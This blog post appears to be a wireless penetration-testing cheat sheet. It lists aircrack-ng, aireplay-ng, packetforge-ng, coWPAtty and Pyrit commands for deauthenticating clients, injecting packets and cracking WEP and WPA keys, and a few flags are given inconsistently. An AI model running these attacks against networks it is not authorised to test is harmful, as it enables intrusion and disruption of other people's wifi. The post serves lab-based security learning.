Welcome to the Attacking Wifi Series. This series of blog posts will cover different scenarios around pen testing and Hacking Wifi.
This post will highlight many of the different aircrack-ng commands used in hacking/pen testing wireless networks. This post does not go into the how, but is more of a reference of the commands and parameters.
Table of Contents
Posts in this Series
Since this series will be covering several Wifi hacking scenarios, we have decided to make each scenario its own post. Each post will walk you through the steps of the attack. While the steps provided are sufficient for carrying out the attacks, it is recommended that you attain an understanding of the attacks and why they work. Information is provided to allow you to setup each scenario in your own wifi lab so that you can actually practice the attack. If you don’t have a spare AP to use for this, check out Rasperry Pi as an Wifi AP on how to create a wifi ap on a raspberry pi for the purpose of practicing hacking wifi.
Below is a list of posts for this series.
- Overview & Commands <– This post
- Hacking WEP with Connected Clients - Published on 3/18/20
- Hacking WEP via a Client - Published on 4/23/20
- Hacking Clientless WEP Networks - Published on 4/25/20
- Bypassing WEP Shared Key Authentication - Published on 4/27/20
- Hacking WPA/WPA2 PSK - Published on 5/4/20
Monitor Mode
There are a couple different options for putting your wifi adapter into monitor mode.
iw dev <interface> set monitor none
airmon-ng start <interface>
Scanning Networks
Airodump-ng is used to scan for wifi networks and clients that are in the range of your wireless card
airodump-ng -c <channel> -w <capture> --wps --band abg --essid <essid> --bssid <bssid> <int>
The required parameters
The wireless interface that is in monitor mode
The following flags are all optional
-c <channel>
This will filter your scan to a specific wifi channel--wps
This flag will include WPS information for wireless networks found-w <capture>
This flag will write the scan results to a file--band <bands>
This flag allows you to only scan wifi networks operating on specified bands--essid <essid>
This flag will filter the scan to a specific Client--bssid <bssid>
This flag will filter the scan to a specific AP
Deauthentication Attack
This attacks sends disassociate packets to one or more clients connected to a specific AP
aireplay-ng -0 <num> -a <ap> -c <client> <int>
All parameters and flags are required
Deauthentication attack method<num>
The number of deauths to send, 0 will send continuously-a <ap>
The mac address of the AP-c <client>
The mac address of the client to deauthenticate<int>
The wireless interface to use
The following are various methods that can be used to crack the authentication of wireless networks.
IV-based Crack
The following is a method of IV-based cracking. This is aircrack-ng’s default methed of cracking when no flags are provided. This method only works for WEP, not WPA/WPA2/WPA3.
aircrack-ng <capture>
PTW-based Crack
The PTW attack is both the newest and most powerful WEP attack. It only require 20,000 to 40,000 packets to be successful, though in some cases as many as 70,000 packets could be needed for a successful attack.
aircrack-ng -z <capture>
Invokes WEP PTW Attack mode
Word List-based Crack
This method works for both WEP and WPA-PSK cracking.
aircrack-ng -w <wordlist> <capture>
-w <wordlist>
The wordlist to use to try and crack WEP/WPA-PSK
If the capture file does not contain the APs SSID, you will have to use the following command to specify the extra information aircrack needs for generating the PMKs
aircrack-ng -w <wordlist> -e <essid> -b <bssid> <capture>
-e <essid>
The SSID of the AP-b <bssid>
The mac address of the AP
Airolib DB Crack
Airolib-ng is a tool for managing and storing ESSIDs and password lists, compute their Pairwise Master Keys, and use them to crack WPA and WPA2 passwords.
aircrack-ng -r <dbName> <capture>
-r <dbName> - The name of the airolib-ng database
JTR-based Crack
This method uses John the Ripper and a wordlist while applying word mangling rules to attempt to crack a WPA/WPA2 Password
john --wordlist=<wordlist> --rules --stdout | aircrack-ng -e <essid> -w - <capture>
--wordlist=<wordlist> - The word list to use
--rules - apply word mangling rules
WEP Attacks
Fake Authentication
The fake authentication attack allows you to associate to an access point using either of the two types of WEP authentication: the open system and shared key authentication.
This attack is useful in scenarios where there are no associated clients and you need to fake an authentication to the AP.
aireplay-ng -1 0 -e <essid> -a <ap> -h <you> <interface>
-1 - Fake Authentication Attack
0 - The reassociation timing in seconds
-e <essid> - The wireless network name (ESSID)
-a <ap> - The AP MAC address
-h <you> - Your attacking MAC address
ARP Request Replay Attack
The ARP request replay attack is the most effective way to generate new initialization vectors and of all the attacks Aireplay has to offer, this attack is probably the most reliable.
aireplay-ng -3 -b <ap> -h <you> <interface>
-3 - ARP Request Replay Attack
-b <ap> - The AP MAC address
-h <you> - Your attacking MAC address
For this attack, your wireless card needs to be in monitor mode and you will need either the MAC address of an associated client or your own MAC address after having performed a fake authentication with the AP.
Interactive Packet Replay Attack
The Interactive Packet Replay attack allows you to choose a specific packet for replaying/injecting against the target network.
aireplay-ng -2 -b <ap> -d ff:ff:ff:ff:ff:ff -f 1 -m 68 -n 86 <interface>
-2 - Interactive Packet Replay Attack
-b <ap> - The AP MAC address
-d ff:ff:ff:ff:ff:ff - Select packets with a broadcast destination address
-t 1 - Select packets with the "To Distribution System" flag set
-m <num> - Minimum packet size
-n <num> - Maximum packet size
KoreK chopchop attack
The Korek chopchop attack, when successful, can decrypt a WEP data packet without knowing the WEP key and can even work against dynamic WEP.
This attack does not recover the WEP key itself; it merely reveals the plaintext of the packets.
aireplay-ng -4 -b <ap> -h <you> <interface>
-4 - KoreK ChopChop Attack
-b <ap> - The AP MAC address
- `-h
- The source MAC address
Fragmentaion Attack
This attack works by obtaining a small amount of the keying material from the packet and then attempts to send ARP and/or LLC packets with known content to the AP. If the packet is successfully echoed back by the AP, then a larger amount of the keying information can be obtained from the returned packet. This process is repeated until 1500 bytes of the PRGA are obtained.
aireplay-ng -5 -b <ap> -h <you> <interface>
-5 - The Fragmentation Attack
-b <ap> - The AP MAC address
-h <you> - Source MAC address
Craft ARP Request Packet**
Packetforge-ng is used to create encrypted packets that can later be used for injection. You can create various types of packets such as UDP and ICMP packets although it is most commonly used to create ARP requests for subsequent injection.
packetforge-ng -0 -a <ap> -h <you> -l <sourceIP> -k <destIP> -y <xorFile> -w <out>
-0 - Generate an ARP request packet
-a <ap> - The AP MAC Address
-h <you> - The source MAC address
-k <distIP> - The destination IP
-l <sourceIP> - The source IP
-y <xorFile> - The PRGA filename
-w - The filename to save the packet to
Inject Packet/Interactive Packet Replay
This attack uses a crafted ARP request packet and injects it to capture enough IVs to subsequently crack the WEP key on the AP
aireplay-ng -2 -r <packet> <interface>
-2 - Interactive Packet Replay Attack
-r <packet> - Filename of the crafted ARP packet
Fake Shared Key Authentication
This attack is used for bypassing WEP Share Key Authentication. It uses a captured keystream file and conducts a fake authentication.
aireplay -1 -0 -e <essid> -y <captureFile> -a <ap> -h <you> <interface>
-1 - Fake Authentication Attack
0 - Reassociation timing in seconds
-e <essid> - The wireless network name(SSID)
-y <captureFile> - Filename of the captured keystream
-a <ap> - The AP MAC address
-h <you> - Source MAC address
WPA Attacks
coWPAtty Attack
Dictionary Mode
coWPAtty is a versatile tool that can recover WPA pre-shared keys, from a captured handshake, using either dictionary or rainbow table attacks.
cowpatty -r <capture> -f <wordlist> -2 -s <essid>
-r <capture>
- The capture filename-f <wordlist>
- The wordlist to use-2
- Use non-strict mode as coWPAtty has an issue with airodump-ng captures- `-s
- The network ESSID
Rainbow Table Mode
Generate the hashes for our ESSID along with a dictionary file containing password
genpmk -f <wordlist> -d <hashesFilename> -s <essid>
-f <wordlist>
- The path to the dictionary file-d <hashesFilename>
- The filename to save the computed hashes to-s <essid>
- The network ESSID
Run coWPAtty using the generated hashes
cowpatty -r <capture> -d <hashesFilename> -2 -s <essid>
-r <capture>
- The capture filename-d <hashesFilename>
- The file name of the computed hashes to use-2
- Use non-strict mode as coWPAtty has an issue with airodump-ng captures-s <essid>
- The network ESSID
Pyrit Sniff
Pyrit, like airolib-ng and coWPAtty, uses a pre-computed database of WPA pre-shared key tables, though with the distinct advantage of being able to leverage GPUs to accelerate the generation of PMK tables.
pyrit -r <interface> -o <capture> stripLive
-r <interface>
- The wireless interface to use-o <capture>
- The file to save the captured data tostriplive
- Only saves the WPA handshakes
Validate the 4-way handshake
Pyrit is able to analyze the capture file and determine if the capture contains any valid handshakes
pyrit -r <capture> analyze
-r <capture>
- The capture file
Pyrit Crack Dictionary
Launching pyrit using a basic dictionary attack
pyrit -r <capture> -i <wordlist> -b <ap> attack_passthrough
-r <capture>
- The capture file-i <wordlist>
- The wordlist file to use-b <ap>
- The OPTIONAL BSSID of the target APattack_passthrough
- Attempt to crack the WPA password using the wordlist
Pyrit Crack Database
Import Wordlist into Database
pyrit -i <wordlist> import_passwords
-i <wordlist>
- The wordlist to useimport_passwords
- Import the passwords into the database
Add the ESSID of the Access Point
pyrit -e <essid> create_essid
-e <essid>
- The network ESSIDcreate_essid
- Import the network ESSID
Compute the PMKs
pyrit batch
Launch Pyrit in database mode
pyrit -r <capture> -b <ap> attack_db
-r <capture>
- The capture file-b <ap>
- The AP’s MAC address